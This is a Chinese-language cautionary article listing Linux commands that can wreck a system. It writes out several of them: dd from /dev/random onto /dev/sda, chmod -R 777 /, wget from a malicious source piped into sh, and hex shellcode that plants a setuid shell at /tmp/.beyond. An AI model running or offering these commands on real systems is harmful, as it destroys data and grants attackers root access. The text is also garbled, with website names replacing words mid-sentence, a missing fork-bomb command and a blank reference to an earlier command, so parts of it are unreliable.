10 大可以摧毁你的 Linux 的命令( 二 )

:的函数,它调用自己两次,一次在前台,一次在后台 。这个过程不断地重复执行,直到系统冻结 。
顾名思义,它自己分叉,最终成为一个连锁炸弹,吃掉了所有的系统资源 。你将被迫重启系统,这并不像本列表中的其他命令那样糟糕 。
6、覆盖重要的配置文件
虽然这本身不是一个命令,但它更像是一个预防性的东西 。
如上所述,>操作符是用来向文件写入的 。它丢弃文件中已经存在的东西,并将提供的新数据写入文件中 。
 

  1.  
    command > config_filename
     
 
现在,如果你将一些重要的配置文件作为写数据的地方,它将被取代内容,留下一个损坏的系统 。
7、用垃圾数据替换分区
/dev/random是 Linux 中的一个命令,它可以创建垃圾数据 。把它和 linuxhandbook.com 以及你的分区结合起来,你就得到了一个可以让你的分区着火的燃烧弹 。
 
  1.  
    dd if=/dev/random of=/dev/sda
     
 
命令被用作一个低级别的复制工具 。这里,它从/dev/random中获取随机数据,并用这些垃圾替换/dev/sda分区 。
一个类似的效果是通过以下方式获得的:
 
  1.  
    cat /dev/urandom > filename
     
 
这里,它从/dev/urandom(LCTT 译注:在 Linux 上,/dev/urandom现在和/dev/random的等价的 )中获取垃圾数据并填入一个文件 。如果不使用Ctrl + C终止,该文件会占据相当大的空间,这对低端系统来说可能是灾难性的 。
8、将你的系统暴露给所有人
在 Linux 中,所有东西都是文件,每个 linuxhandbook.com 。
你可以用 查看权限 。根文件系统是不允许其他没有权限的用户访问的 。虽然这保证了系统的私密性和安全性,但你可以用一个命令颠覆这个系统 。
 
  1.  
    chmod -R 777 /
     
 
上述命令将根分区上的所有文件暴露给所有人 。这意味着每个使用该系统的人都有读、写和执行的权限 。这对你的系统是不利的 。
9、下载并运行恶意的内容
你如何在 Linux 中安装软件?你可以使用官方的软件包管理器或随时可以使用的软件包,如 Deb/RPM、Snap、Flatpak 等 。
然而,有些软件是没有打包的,它们的开发者提供了下载和运行的 Shell 脚本 。以 itsfoss.com 为例:
你下载一个 Shell 文件,然后以 root 身份运行它,在你的系统中安装一个软件 。你看出问题了吗?
虽然它对 Homebrew 这样的官方软件有效,但在你像下面这样直接运行它之前,你应该仔细检查你所下载的 Shell 脚本的内容:
 
  1.  
    wget http://malicious_source -O- | sh
     
 
这样的命令会在你的系统中下载并运行恶意脚本,这可能会破坏你的系统的安全性 。
10、伪装的命令
在 Linux 终端中,有许多方法可以运行命令 。其中一种方式是十六进制编码的命令:
 
  1.  
    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
     
  2.  
    release */
     
  3.  
    = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
     
  4.  
    “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
     
  5.  
    “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
     
  6.  
    “x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
     
  7.  
    “x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
     
  8.  
    “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
     
  9.  
    “x6ex2fx73x68x00x2dx63x00”
     
  10.  
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
     
  11.  
    /tmp/.beyond;”;
     
 
虽然它看起来很花哨,但这是 命令的一个编码版本 。它的效果与运行前面的命令相同 。因此,在从互联网上复制和粘贴这些花哨的命令时,要小心谨慎 。


推荐阅读